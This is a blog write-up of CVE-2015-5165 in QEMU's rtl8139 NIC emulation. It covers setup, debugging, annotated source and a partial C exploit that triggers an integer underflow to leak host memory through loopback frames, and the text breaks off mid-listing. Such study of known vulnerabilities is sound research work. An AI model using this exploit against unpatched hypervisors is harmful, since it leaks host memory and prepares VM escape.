MozhuCY's blog.

CVE-2015-7504 / CVE-2015-5165: QEMU VM Escape Vulnerability Analysis

1970/01/01

QEMU

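  • QEMU is a processor emulator that is widely used on Linux. Virtual machine vulnerabilities generally fall into two classes, DoS and escape. Escape bugs are the most dangerous, but they are also the hardest to find.
  • Most bugs show up in the emulation of I/O. Guest/host interaction involves a lot of variable-length data, so the data-handling code often contains overflow-style bugs, and such an overflow is usually enough to crash the virtual machine.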

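Purpose of the analysis

  • The goal is to use vulnerabilities that already have public PoCs, together with the fact that QEMU is open source, to get familiar with the causes and mechanics of virtual machine vulnerabilities, as groundwork for hunting bugs in other kinds of hypervisors later.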

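Environment setup

  • I was stuck here for a long time: QEMU kept printing "VNC server running on 127.0.0.1:5900" because the SDL library was missing. I first installed it with apt following an online tutorial, but configure still reported "SDL support no". It turned out that there is another, newer version of the SDL library; after installing it and rebuilding, the problem went away.
  • Building QEMU from source was otherwise fine. Because I had downloaded a tarball, the code had somehow been modified slightly, so checking out the vulnerable branch directly did not work; I had to add and commit first, then check out.
  • I switched Ubuntu to the Aliyun mirror, which resolved the dependencies without much trouble, and the vulnerable version of QEMU then compiled cleanly. Note that the bug is in the pcnet NIC; back up a copy of the source after the checkout.
  • Next you need a good qcow2 image. Building one directly from an ISO is tedious, but fortunately qemu-img can convert a VMDK virtual disk into a QEMU one. First merge the VMDK with the vmware-vdiskmanager.exe tool shipped with VMware: vmware-vdiskmanager.exe -r "D:\vm\Ubuntu 64 位.vmdk" -t 0 "D:\ubuntu.vmdk". Then copy the merged VMDK into the virtual machine and convert it with qemu-img: qemu-img convert -f vmdk -O qcow2 input.vmdk output.qcow2
  • Then start the guest. Two NICs have to be specified, because the vulnerabilities are in pcnet (CVE-2015-7504) and rtl8139 (CVE-2015-5165) respectively. To speed QEMU up, add -enable-kvm. Note that this requires the outer virtual machine to support KVM, which can be turned on by enabling virtualization in the VMware VM settings.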
./qemu-system-x86_64 -enable-kvm -m 2048 \
-netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \
-netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \
-drive file=<path_to_image>,format=qcow2,if=ide,cache=writeback
  • The guest boots successfully.

Debugging QEMU

  • gdb qemu-system-x86_64 -x start.sh, with the following gdb commands in start.sh:
set args -enable-kvm -m 2048 -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 -drive file=/home/mozhucy/Desktop/qemu-exp.qcow2,format=qcow2,if=ide,cache=writeback

break hw/net/rtl8139.c:2173

r

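Network configuration

Sometimes the exploit has to be copied into the guest, but in the last few debugging sessions the guest network could not reach the outside, i.e. pinging 10.0.2.2 failed. ifconfig -a showed that the other NIC had been renamed to ens33, so it has to be changed back to eth0 as follows:

Edit /etc/default/grub (vim /etc/default/grub) and replace the contents of the quotes in GRUB_CMDLINE_LINUX="" with net.ifnames=0 biosdevname=0

Then run grub-mkconfig -o /boot/grub/grub.cfg

Then edit /etc/network/interfaces, change ens33 to eth0, and reboot the guest.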

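Vulnerability analysis

CVE-2015-5165

This is a bug in a virtual NIC. It lives in the rtl8139 emulation, in the function static int rtl8139_cplus_transmit_one(RTL8139State *s). When a TCP packet is transmitted, the protocol parsing contains an integer underflow that can be turned into an information leak. The details are as follows.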

static int rtl8139_cplus_transmit_one(RTL8139State *s)
{
...

uint8_t *saved_buffer = s->cplus_txbuffer;
int saved_size = s->cplus_txbuffer_offset;
int saved_buffer_len = s->cplus_txbuffer_len;

...
struct ip_header *ip = NULL;
int hlen = 0;
uint8_t ip_protocol = 0;
uint16_t ip_data_len = 0;

uint8_t *eth_payload_data = NULL;
size_t eth_payload_len = 0;

...

eth_payload_data = saved_buffer + ETH_HLEN;
eth_payload_len = saved_size - ETH_HLEN;

...

ip = (struct ip_header*)eth_payload_data;

if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
DPRINTF("+++ C+ mode packet has bad IP version %d "
"expected %d\n", IP_HEADER_VERSION(ip),
IP_HEADER_VERSION_4);
goto skip_offload;
}

hlen = IP_HDR_GET_LEN(ip);
if (hlen < sizeof(struct ip_header) || hlen > eth_payload_len) {
goto skip_offload;
}

ip_protocol = ip->ip_p;

ip_data_len = be16_to_cpu(ip->ip_len);
if (ip_data_len < hlen || ip_data_len > eth_payload_len) {
goto skip_offload;
}
ip_data_len -= hlen;

....


}

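In rtl8139_cplus_transmit_one, the function parses the network packet held in the Tx buffer. While parsing the IP header it computes ip_data_len -= hlen, where ip_data_len and hlen both come from attacker-controlled fields of ip_header. Note that the listing above appears to come from a patched tree: it contains the ip_data_len < hlen check, whereas the vulnerable version performs the subtraction without it.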

struct ip_header {
uint8_t ip_ver_len; /* version and header length */
uint8_t ip_tos; /* type of service */
uint16_t ip_len; /* total length */
uint16_t ip_id; /* identification */
uint16_t ip_off; /* fragment offset field */
uint8_t ip_ttl; /* time to live */
uint8_t ip_p; /* protocol */
uint16_t ip_sum; /* checksum */
uint32_t ip_src, ip_dst; /* source and destination address */
};

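In other words, the header length encoded in ip_ver_len is subtracted from ip_len, but the vulnerable code never compares the two first. In a normal packet the header length is always smaller than ip_len, because ip_len is the IP header length plus the TCP header length plus the data length.

If we make ip_len smaller than hlen, the subtraction underflows: with ip_len = 0x13 and hlen = 0x14 the result is -1, and since ip_data_len is a uint16_t, the value actually stored is 0xffff.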
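The wraparound can be reproduced outside QEMU. The following is a minimal sketch, not QEMU code: the helper names (ipv4_header_len, ipv4_total_len, unchecked_ip_data_len) are made up for illustration, and the function only mirrors the unchecked subtraction described above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Header length in bytes: the low nibble of the first IPv4 byte counts
 * 32-bit words. (Hypothetical helper, not a QEMU function.) */
static unsigned ipv4_header_len(const uint8_t *ip)
{
    return (unsigned)(ip[0] & 0x0f) * 4;
}

/* Total-length field: bytes 2..3 of the IPv4 header, big-endian. */
static uint16_t ipv4_total_len(const uint8_t *ip)
{
    return (uint16_t)((ip[2] << 8) | ip[3]);
}

/* Mirrors the unchecked "ip_data_len = ip_len - hlen": the result is
 * truncated to uint16_t, so a too-small ip_len wraps around. */
static uint16_t unchecked_ip_data_len(const uint8_t *ip, size_t avail)
{
    assert(avail >= 4); /* we read the first four header bytes */
    return (uint16_t)(ipv4_total_len(ip) - ipv4_header_len(ip));
}
```

Feeding it the header bytes 0x45 0x00 0x00 0x13 (header length 20, total length 0x13) yields 0xffff, the value discussed above.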

Later on, ip_data_len is used again to compute the size of the TCP payload:

int tcp_data_len = ip_data_len - tcp_hlen;
int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;

....


for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size)
{
....

if (tcp_send_offset)
{
memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size);
}

....

int tso_send_size = ETH_HLEN + hlen + tcp_hlen + chunk_size;
DPRINTF("+++ C+ mode TSO transferring packet size "
"%d\n", tso_send_size);
rtl8139_transfer_frame(s, saved_buffer, tso_send_size,
0, (uint8_t *) dot1q_buffer);

/* add transferred count to TCP sequence number */
stl_be_p(&p_tcp_hdr->th_seq,
chunk_size + ldl_be_p(&p_tcp_hdr->th_seq));
++send_count;
}

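Here ip_data_len is used to compute tcp_data_len, as ip_data_len minus tcp_hlen. The TCP header has no field that records the segment length, so the length is derived from the IP header. As a result, the memcpy / rtl8139_transfer_frame loop sends far more frames than the buffer really holds, and we can then read that extra data back from the Rx buffer.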
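To get a feel for how much data is sent, the loop bounds can be evaluated on their own. This is a sketch under stated assumptions: tso_chunk_count is a hypothetical helper that copies only the arithmetic of the loop shown above, with ETH_MTU taken as 1500 as in the exploit's own definitions.

```c
#include <assert.h>
#include <stdint.h>

#define ETH_MTU 1500

/* Counts how many times the segmentation loop would iterate, i.e. how many
 * frames are handed to rtl8139_transfer_frame, for the given header values.
 * ip_data_len is the value after the (unchecked) subtraction of hlen. */
static int tso_chunk_count(uint16_t ip_data_len, int hlen, int tcp_hlen)
{
    int tcp_data_len = ip_data_len - tcp_hlen;
    int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
    int count = 0;

    assert(tcp_chunk_size > 0); /* otherwise the loop would never advance */

    for (int off = 0; off < tcp_data_len; off += tcp_chunk_size) {
        ++count;
    }
    return count;
}
```

With ip_data_len = 0xffff and 20-byte IP and TCP headers, tcp_data_len is 65515 and each chunk carries 1460 bytes, so the loop runs 45 times, reading well past the data the guest actually supplied.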

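So we now need to make the NIC transmit a packet and then receive it, which means driving the NIC directly. We do this through port I/O, using the out*() and in*() functions. The port range can be found in /proc/ioports: c000-c0ff belongs to the 8139 NIC. The register offsets used to operate the rtl8139 are: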

enum RTL8139_registers {
MAC0 = 0, /* Ethernet hardware address. */
MAR0 = 8, /* Multicast filter. */
TxStatus0 = 0x10,/* Transmit status (Four 32bit registers). C mode only */
/* Dump Tally Conter control register(64bit). C+ mode only */
TxAddr0 = 0x20, /* Tx descriptors (also four 32bit). */
RxBuf = 0x30,
ChipCmd = 0x37,
RxBufPtr = 0x38,
RxBufAddr = 0x3A,
IntrMask = 0x3C,
IntrStatus = 0x3E,
TxConfig = 0x40,
RxConfig = 0x44,
Timer = 0x48, /* A general-purpose counter. */
RxMissed = 0x4C, /* 24 bits valid, write clears. */
Cfg9346 = 0x50,
Config0 = 0x51,
Config1 = 0x52,
FlashReg = 0x54,
MediaStatus = 0x58,
Config3 = 0x59,
Config4 = 0x5A, /* absent on RTL-8139A */
HltClk = 0x5B,
MultiIntr = 0x5C,
PCIRevisionID = 0x5E,
TxSummary = 0x60, /* TSAD register. Transmit Status of All Descriptors*/
BasicModeCtrl = 0x62,
BasicModeStatus = 0x64,
NWayAdvert = 0x66,
NWayLPAR = 0x68,
NWayExpansion = 0x6A,
/* Undocumented registers, but required for proper operation. */
FIFOTMS = 0x70, /* FIFO Control and test. */
CSCR = 0x74, /* Chip Status and Configuration Register. */
PARA78 = 0x78,
PARA7c = 0x7c, /* Magic transceiver parameter register. */
Config5 = 0xD8, /* absent on RTL-8139A */
/* C+ mode */
TxPoll = 0xD9, /* Tell chip to check Tx descriptors for work */
RxMaxSize = 0xDA, /* Max size of an Rx packet (8169 only) */
CpCmd = 0xE0, /* C+ Command register (C+ mode only) */
IntrMitigate = 0xE2, /* rx/tx interrupt mitigation control */
RxRingAddrLO = 0xE4, /* 64-bit start addr of Rx ring */
RxRingAddrHI = 0xE8, /* 64-bit start addr of Rx ring */
TxThresh = 0xEC, /* Early Tx threshold */
};

The I/O port handlers are:

static void rtl8139_ioport_write(void *opaque, hwaddr addr,
uint64_t val, unsigned size)
{
switch (size) {
case 1:
rtl8139_io_writeb(opaque, addr, val);
break;
case 2:
rtl8139_io_writew(opaque, addr, val);
break;
case 4:
rtl8139_io_writel(opaque, addr, val);
break;
}
}

static uint64_t rtl8139_ioport_read(void *opaque, hwaddr addr,
unsigned size)
{
switch (size) {
case 1:
return rtl8139_io_readb(opaque, addr);
case 2:
return rtl8139_io_readw(opaque, addr);
case 4:
return rtl8139_io_readl(opaque, addr);
}

return -1;
}

Reads and writes each come in three widths (byte, word and long). Each width-specific handler then dispatches on the register address:

static void rtl8139_io_writeb(void *opaque, uint8_t addr, uint32_t val)
{
RTL8139State *s = opaque;

switch (addr)
{
case MAC0 ... MAC0+4:
s->phys[addr - MAC0] = val;
break;
case MAC0+5:
s->phys[addr - MAC0] = val;
qemu_format_nic_info_str(qemu_get_queue(s->nic), s->phys);
break;
case MAC0+6 ... MAC0+7:
/* reserved */
break;
case MAR0 ... MAR0+7:
s->mult[addr - MAR0] = val;
break;
case ChipCmd:
rtl8139_ChipCmd_write(s, val);
break;
case Cfg9346:
rtl8139_Cfg9346_write(s, val);
break;
case TxConfig: /* windows driver sometimes writes using byte-lenth call */
rtl8139_TxConfig_writeb(s, val);
break;
case Config0:
rtl8139_Config0_write(s, val);
break;
case Config1:
rtl8139_Config1_write(s, val);
break;
case Config3:
rtl8139_Config3_write(s, val);
break;
case Config4:
rtl8139_Config4_write(s, val);
break;
case Config5:
rtl8139_Config5_write(s, val);
break;
case MediaStatus:
/* ignore */
DPRINTF("not implemented write(b) to MediaStatus val=0x%02x\n",
val);
break;

case HltClk:
DPRINTF("HltClk write val=0x%08x\n", val);
if (val == 'R')
{
s->clock_enabled = 1;
}
else if (val == 'H')
{
s->clock_enabled = 0;
}
break;

case TxThresh:
DPRINTF("C+ TxThresh write(b) val=0x%02x\n", val);
s->TxThresh = val;
break;

case TxPoll:
DPRINTF("C+ TxPoll write(b) val=0x%02x\n", val);
if (val & (1 << 7))
{
DPRINTF("C+ TxPoll high priority transmission (not "
"implemented)\n");
//rtl8139_cplus_transmit(s);
}
if (val & (1 << 6))
{
DPRINTF("C+ TxPoll normal priority transmission\n");
rtl8139_cplus_transmit(s);
}

break;

default:
DPRINTF("not implemented write(b) addr=0x%x val=0x%02x\n", addr,
val);
break;
}
}

This gives the final call chain:

rtl8139_ioport_write
rtl8139_io_writeb
rtl8139_cplus_transmit
rtl8139_cplus_transmit_one
....

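Writing the exploit

iopl(3)

This raises the I/O privilege level so that the process may access the ports. We then satisfy the constraints along the NIC's code path one by one.

First, at the top of the function: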

if (!rtl8139_transmitter_enabled(s))
{
DPRINTF("+++ C+ mode: transmitter disabled\n");
return 0;
}

if (!rtl8139_cp_transmitter_enabled(s))
{
DPRINTF("+++ C+ mode: C+ transmitter disabled\n");
return 0 ;
}
static int rtl8139_transmitter_enabled(RTL8139State *s)
{
return s->bChipCmdState & CmdTxEnb;
}

static int rtl8139_cp_transmitter_enabled(RTL8139State *s)
{
return s->CpCmd & CPlusTxEnb;
}

So we have to write the CpCmd and ChipCmd registers of the RTL8139, as follows (which out* width to use can be read off the I/O dispatch functions):

outb(CmdTxEnb|CmdRxEnb,RTL8139 + ChipCmd);
outw(CPlusTxEnb|CPlusRxEnb,RTL8139 + CpCmd);

Immediately after that:

PCIDevice *d = PCI_DEVICE(s);
int descriptor = s->currCPlusTxDesc;

dma_addr_t cplus_tx_ring_desc = rtl8139_addr64(s->TxAddr[0], s->TxAddr[1]);

/* Normal priority ring */
cplus_tx_ring_desc += 16 * descriptor;

DPRINTF("+++ C+ mode reading TX descriptor %d from host memory at "
"%08x %08x = 0x"DMA_ADDR_FMT"\n", descriptor, s->TxAddr[1],
s->TxAddr[0], cplus_tx_ring_desc);

uint32_t val, txdw0,txdw1,txbufLO,txbufHI;

pci_dma_read(d, cplus_tx_ring_desc, (uint8_t *)&val, 4);
txdw0 = le32_to_cpu(val);
pci_dma_read(d, cplus_tx_ring_desc+4, (uint8_t *)&val, 4);
txdw1 = le32_to_cpu(val);
pci_dma_read(d, cplus_tx_ring_desc+8, (uint8_t *)&val, 4);
txbufLO = le32_to_cpu(val);
pci_dma_read(d, cplus_tx_ring_desc+12, (uint8_t *)&val, 4);
txbufHI = le32_to_cpu(val);

DPRINTF("+++ C+ mode TX descriptor %d %08x %08x %08x %08x\n", descriptor,
txdw0, txdw1, txbufLO, txbufHI);

The code takes two uint32_t values from s->TxAddr[0] and s->TxAddr[1] and combines them into cplus_tx_ring_desc, the address of the C+ Tx ring descriptor. Judging from the pci_dma_read calls, the descriptor can be written roughly like this:

struct cplus_tx_ring_desc
{
uint32_t txdw0;
uint32_t txdw1;
uint32_t txbufLO;
uint32_t txbufHI;
};
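Because the device fetches this descriptor with pci_dma_read, the address written to TxAddr has to be a guest-physical one, so a user-space program must translate its virtual addresses first. The exploit later in this post does that through /proc/self/pagemap. The sketch below isolates the arithmetic only; the helper names are hypothetical, and it assumes 4 KiB pages and the documented pagemap layout (bit 63 = present, bits 0..54 = page frame number). On recent kernels, reading real PFNs is likely to require root.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1ull << PAGE_SHIFT)
#define PAGEMAP_PRESENT (1ull << 63)        /* page is present in RAM */
#define PAGEMAP_PFN_MASK ((1ull << 55) - 1) /* bits 0..54: page frame number */

/* Byte offset of the 8-byte pagemap entry that describes vaddr. */
static uint64_t pagemap_offset(uint64_t vaddr)
{
    return (vaddr >> PAGE_SHIFT) * 8;
}

/* Combine a pagemap entry with the in-page offset of vaddr to obtain the
 * physical address. */
static uint64_t pagemap_entry_to_phys(uint64_t entry, uint64_t vaddr)
{
    assert(entry & PAGEMAP_PRESENT); /* the PFN is only valid if present */
    uint64_t pfn = entry & PAGEMAP_PFN_MASK;
    return (pfn << PAGE_SHIFT) | (vaddr & (PAGE_SIZE - 1));
}
```

In practice the entry would be read with lseek to pagemap_offset(vaddr) followed by an 8-byte read. The page should be touched beforehand (for example with memset) so that it is actually mapped.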

Next, a number of flag bits have to be set in order to reach the final loop. Finally, TxLoopBack has to be enabled so that we receive the packets we send.

if (!(txdw0 & CP_TX_OWN))
{
return 0 ;
}

if (txdw0 & CP_TX_FS)
{
s->cplus_txbuffer_offset = 0;
}

int txsize = txdw0 & CP_TX_BUFFER_SIZE_MASK;
dma_addr_t tx_addr = rtl8139_addr64(txbufLO, txbufHI);

if (!s->cplus_txbuffer)
{
s->cplus_txbuffer_len = CP_TX_BUFFER_SIZE;
s->cplus_txbuffer = g_malloc(s->cplus_txbuffer_len);
s->cplus_txbuffer_offset = 0;

DPRINTF("+++ C+ mode transmission buffer allocated space %d\n",
s->cplus_txbuffer_len);
}

....


if (txdw0 & CP_TX_EOR)
{
s->currCPlusTxDesc = 0;
}
else
{
++s->currCPlusTxDesc;
if (s->currCPlusTxDesc >= 64)
s->currCPlusTxDesc = 0;
}

...

if (txdw0 & CP_TX_LS)
{
...

if (txdw0 & (CP_TX_IPCS | CP_TX_UDPCS | CP_TX_TCPCS | CP_TX_LGSEN))
{

....

if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
{

...
for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size)
{
...
if (tcp_send_offset)
{
memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size);
}
...
rtl8139_transfer_frame(s, saved_buffer, tso_send_size,
0, (uint8_t *) dot1q_buffer);

...
}
...
}
...
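The conditions in the listing above translate into a specific value for the first descriptor word. As a rough sketch (make_txdw0 is a hypothetical helper; the bit positions are the ones defined in the exploit source below), the word could be assembled like this:

```c
#include <assert.h>
#include <stdint.h>

#define CP_TX_OWN   (1u << 31) /* descriptor is owned by the device */
#define CP_TX_EOR   (1u << 30) /* last descriptor of the ring */
#define CP_TX_LS    (1u << 28) /* last segment: triggers the actual send */
#define CP_TX_LGSEN (1u << 27) /* large send: enables the TCP chunk loop */
#define CP_TX_IPCS  (1u << 18) /* IP checksum offload: enters header parsing */
#define CP_TX_BUFFER_SIZE_MASK ((1u << 16) - 1)

/* Build txdw0 so that the transmit path reaches the segmentation loop.
 * buf_size is the number of bytes to read from the Tx buffer. */
static uint32_t make_txdw0(uint32_t buf_size)
{
    assert(buf_size <= CP_TX_BUFFER_SIZE_MASK); /* size lives in bits 0..15 */
    return CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_IPCS | CP_TX_LGSEN
           | buf_size;
}
```

For a full-size frame of ETH_MTU + ETH_HLEN = 1514 bytes this gives 0xD80405EA. Using unsigned constants (1u << 31) avoids shifting into the sign bit of an int.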

This is the first version of the exploit:

#include <sys/io.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

int fd;

#define RTL8139 0xc000

#define ETH_HLEN 14
#define ETH_MTU 1500

#define PAGE_SIZE 0x1000
/* w0 ownership flag */
#define CP_TX_OWN (1<<31)
/* w0 end of ring flag */
#define CP_TX_EOR (1<<30)
/* first segment of received packet flag */
#define CP_TX_FS (1<<29)
/* last segment of received packet flag */
#define CP_TX_LS (1<<28)
/* large send packet flag */
#define CP_TX_LGSEN (1<<27)
/* large send MSS mask, bits 16...25 */
#define CP_TC_LGSEN_MSS_MASK ((1 << 12) - 1)

/* IP checksum offload flag */
#define CP_TX_IPCS (1<<18)
/* UDP checksum offload flag */
#define CP_TX_UDPCS (1<<17)
/* TCP checksum offload flag */
#define CP_TX_TCPCS (1<<16)

/* w0 bits 0...15 : buffer size */
#define CP_TX_BUFFER_SIZE (1<<16)
#define CP_TX_BUFFER_SIZE_MASK (CP_TX_BUFFER_SIZE - 1)
/* w1 add tag flag */
#define CP_TX_TAGC (1<<17)
/* w1 bits 0...15 : VLAN tag (big endian) */
#define CP_TX_VLAN_TAG_MASK ((1<<16) - 1)
/* w2 low 32bit of Rx buffer ptr */
/* w3 high 32bit of Rx buffer ptr */

/* set after transmission */
/* FIFO underrun flag */
#define CP_TX_STATUS_UNF (1<<25)
/* transmit error summary flag, valid if set any of three below */
#define CP_TX_STATUS_TES (1<<23)
/* out-of-window collision flag */
#define CP_TX_STATUS_OWC (1<<22)
/* link failure flag */
#define CP_TX_STATUS_LNKF (1<<21)
/* excessive collisions flag */
#define CP_TX_STATUS_EXC (1<<20)

#define CP_RX_EOR (1<<30)
#define CP_RX_OWN (1<<31)

#define CP_RX_BUFFER_SIZE_MASK ((1<<13) - 1)
#define USHRT_MAX 65535
enum RTL_8139_tx_config_bits {
TxLoopBack = (1 << 18) | (1 << 17), /* enable loopback test mode */
/*...*/
};

enum RTL_8139_rx_mode_bits {
AcceptErr = 0x20,
AcceptRunt = 0x10,
AcceptBroadcast = 0x08,
AcceptMulticast = 0x04,
AcceptMyPhys = 0x02,
AcceptAllPhys = 0x01,
Wrap = 0x80,
MxDMA256 = 0x400,
RbLen64 = 0x1800,
RxFTh512 = 0xa000,
};
enum RTL8139_registers {
MAC0 = 0, /* Ethernet hardware address. */
MAR0 = 8, /* Multicast filter. */
TxStatus0 = 0x10,/* Transmit status (Four 32bit registers). C mode only */
/* Dump Tally Conter control register(64bit). C+ mode only */
TxAddr0 = 0x20, /* Tx descriptors (also four 32bit). */
RxBuf = 0x30,
ChipCmd = 0x37,
RxBufPtr = 0x38,
RxBufAddr = 0x3A,
IntrMask = 0x3C,
IntrStatus = 0x3E,
TxConfig = 0x40,
RxConfig = 0x44,
Timer = 0x48, /* A general-purpose counter. */
RxMissed = 0x4C, /* 24 bits valid, write clears. */
Cfg9346 = 0x50,
Config0 = 0x51,
Config1 = 0x52,
FlashReg = 0x54,
MediaStatus = 0x58,
Config3 = 0x59,
Config4 = 0x5A, /* absent on RTL-8139A */
HltClk = 0x5B,
MultiIntr = 0x5C,
PCIRevisionID = 0x5E,
TxSummary = 0x60, /* TSAD register. Transmit Status of All Descriptors*/
BasicModeCtrl = 0x62,
BasicModeStatus = 0x64,
NWayAdvert = 0x66,
NWayLPAR = 0x68,
NWayExpansion = 0x6A,
/* Undocumented registers, but required for proper operation. */
FIFOTMS = 0x70, /* FIFO Control and test. */
CSCR = 0x74, /* Chip Status and Configuration Register. */
PARA78 = 0x78,
PARA7c = 0x7c, /* Magic transceiver parameter register. */
Config5 = 0xD8, /* absent on RTL-8139A */
/* C+ mode */
TxPoll = 0xD9, /* Tell chip to check Tx descriptors for work */
RxMaxSize = 0xDA, /* Max size of an Rx packet (8169 only) */
CpCmd = 0xE0, /* C+ Command register (C+ mode only) */
IntrMitigate = 0xE2, /* rx/tx interrupt mitigation control */
RxRingAddrLO = 0xE4, /* 64-bit start addr of Rx ring */
RxRingAddrHI = 0xE8, /* 64-bit start addr of Rx ring */
TxThresh = 0xEC, /* Early Tx threshold */
};

enum ChipCmdBits {
CmdReset = 0x10,
CmdRxEnb = 0x08,
CmdTxEnb = 0x04,
RxBufEmpty = 0x01,
};

/* C+ mode */
enum CplusCmdBits {
CPlusRxVLAN = 0x0040, /* enable receive VLAN detagging */
CPlusRxChkSum = 0x0020, /* enable receive checksum offloading */
CPlusRxEnb = 0x0002,
CPlusTxEnb = 0x0001,
};

struct cplus_desc
{
uint32_t txdw0;
uint32_t txdw1;
uint32_t txbufLO;
uint32_t txbufHI;
};
static uint8_t rtl8139_packet [] = {
0x52, 0x54, 0x00, 0x12, 0x34, 0x56, 0x52, 0x54, 0x00, 0x12, 0x34,
0x56, 0x08, 0x00, 0x45, 0x00, 0x00, 0x13, 0xde, 0xad, 0x40, 0x00,
0x40, 0x06, 0xde, 0xad, 0xc0, 0x08, 0x01, 0x01, 0xc0, 0xa8, 0x01,
0x02, 0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe, 0xca, 0xfe,
0xba, 0xbe, 0x50, 0x10, 0xde, 0xad, 0xde, 0xad, 0x00, 0x00
};

uint32_t v2p(void * addr)
{
uint32_t index = (uint64_t)addr / PAGE_SIZE;
lseek(fd,index * 8,SEEK_SET);
uint64_t num = 0;
read(fd,&num,8);
return ((num & (((uint64_t)1 << 55) - 1)) << 12) + (uint64_t)addr % PAGE_SIZE;

}

void cfgtx(struct cplus_desc * addr,char * buf)
{
addr->txdw0 |= CP_TX_OWN|CP_TX_EOR|CP_TX_LS|CP_TX_IPCS|CP_TX_LGSEN;
addr->txdw0 += ETH_MTU + ETH_HLEN;
addr->txbufLO = v2p(buf);
uint32_t paddr = v2p(addr);
outl(paddr,RTL8139 + TxAddr0);
outl(0,RTL8139 + TxAddr0 + 4);
}
void cfgrx()
{
return;
}

void send(void * buf,void * data,int len)
{
memcpy(buf, data, len);
outb((1 << 6), RTL8139+ TxPoll);
}

int main()
{
fd = open("/proc/self/pagemap",O_RDONLY);
iopl(3);
outb(CmdTxEnb|CmdRxEnb,RTL8139 + ChipCmd);
outw(CPlusTxEnb|CPlusRxEnb,RTL8139 + CpCmd);
outl(TxLoopBack, RTL8139 + TxConfig);
outl(AcceptMyPhys, RTL8139 + RxConfig);

struct cplus_desc * addr = malloc(sizeof(struct cplus_desc));
memset(addr,0,sizeof(struct cplus_desc));

void * tx_buf = malloc(ETH_HLEN + ETH_MTU);
memset(tx_buf,0,ETH_HLEN + ETH_MTU);

cfgtx(addr,tx_buf);


send(tx_buf, rtl8139_packet,sizeof(rtl8139_packet));
sleep(1);
return 0;

}

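The cfgrx() function, i.e. the receive side, is still missing. With loopback enabled, rtl8139_do_receive is called, so this is where Rx has to be initialized. From the source, the logic can be summarized as follows: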

static ssize_t rtl8139_do_receive(NetClientState *nc, const uint8_t *buf, size_t size_, int do_interrupt)
{
RTL8139State *s = qemu_get_nic_opaque(nc);
PCIDevice *d = PCI_DEVICE(s);

....

if (!rtl8139_receiver_enabled(s))
{
DPRINTF("receiver disabled ================\n");
return -1;
}

/* XXX: check this */
if (s->RxConfig & AcceptAllPhys) {
/* promiscuous: receive all */
DPRINTF(">>> packet received in promiscuous mode\n");

} else {
if (!memcmp(buf, broadcast_macaddr, 6)) {
/* broadcast address */
if (!(s->RxConfig & AcceptBroadcast))
{
DPRINTF(">>> broadcast packet rejected\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}

packet_header |= RxBroadcast;

DPRINTF(">>> broadcast packet received\n");

/* update tally counter */
++s->tally_counters.RxOkBrd;

} else if (buf[0] & 0x01) {
/* multicast */
if (!(s->RxConfig & AcceptMulticast))
{
DPRINTF(">>> multicast packet rejected\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}

int mcast_idx = net_crc32(buf, ETH_ALEN) >> 26;

if (!(s->mult[mcast_idx >> 3] & (1 << (mcast_idx & 7))))
{
DPRINTF(">>> multicast address mismatch\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}

packet_header |= RxMulticast;

DPRINTF(">>> multicast packet received\n");

/* update tally counter */
++s->tally_counters.RxOkMul;

} else if (s->phys[0] == buf[0] &&
s->phys[1] == buf[1] &&
s->phys[2] == buf[2] &&
s->phys[3] == buf[3] &&
s->phys[4] == buf[4] &&
s->phys[5] == buf[5]) {
/* match */
if (!(s->RxConfig & AcceptMyPhys))
{
DPRINTF(">>> rejecting physical address matching packet\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}

packet_header |= RxPhysical;

DPRINTF(">>> physical address matching packet received\n");

/* update tally counter */
++s->tally_counters.RxOkPhy;

} else {

DPRINTF(">>> unknown packet\n");

/* update tally counter */
++s->tally_counters.RxERR;

return size;
}
}

/* if too small buffer, then expand it
* Include some tailroom in case a vlan tag is later removed. */
if (size < MIN_BUF_SIZE + VLAN_HLEN) {
memcpy(buf1, buf, size);
memset(buf1 + size, 0, MIN_BUF_SIZE + VLAN_HLEN - size);
buf = buf1;
if (size < MIN_BUF_SIZE) {
size = MIN_BUF_SIZE;
}
}

if (rtl8139_cp_receiver_enabled(s))
{
if (!rtl8139_cp_rx_valid(s)) {
return size;
}

DPRINTF("in C+ Rx mode ================\n");

/* begin C+ receiver mode */

/* w0 ownership flag */
#define CP_RX_OWN (1<<31)
/* w0 end of ring flag */
#define CP_RX_EOR (1<<30)
/* w0 bits 0...12 : buffer size */
#define CP_RX_BUFFER_SIZE_MASK ((1<<13) - 1)
/* w1 tag available flag */
#define CP_RX_TAVA (1<<16)
/* w1 bits 0...15 : VLAN tag */
#define CP_RX_VLAN_TAG_MASK ((1<<16) - 1)
/* w2 low 32bit of Rx buffer ptr */
/* w3 high 32bit of Rx buffer ptr */

int descriptor = s->currCPlusRxDesc;
dma_addr_t cplus_rx_ring_desc;

cplus_rx_ring_desc = rtl8139_addr64(s->RxRingAddrLO, s->RxRingAddrHI);
cplus_rx_ring_desc += 16 * descriptor;

DPRINTF("+++ C+ mode reading RX descriptor %d from host memory at "
"%08x %08x = "DMA_ADDR_FMT"\n", descriptor, s->RxRingAddrHI,
s->RxRingAddrLO, cplus_rx_ring_desc);

uint32_t val, rxdw0,rxdw1,rxbufLO,rxbufHI;

pci_dma_read(d, cplus_rx_ring_desc, &val, 4);
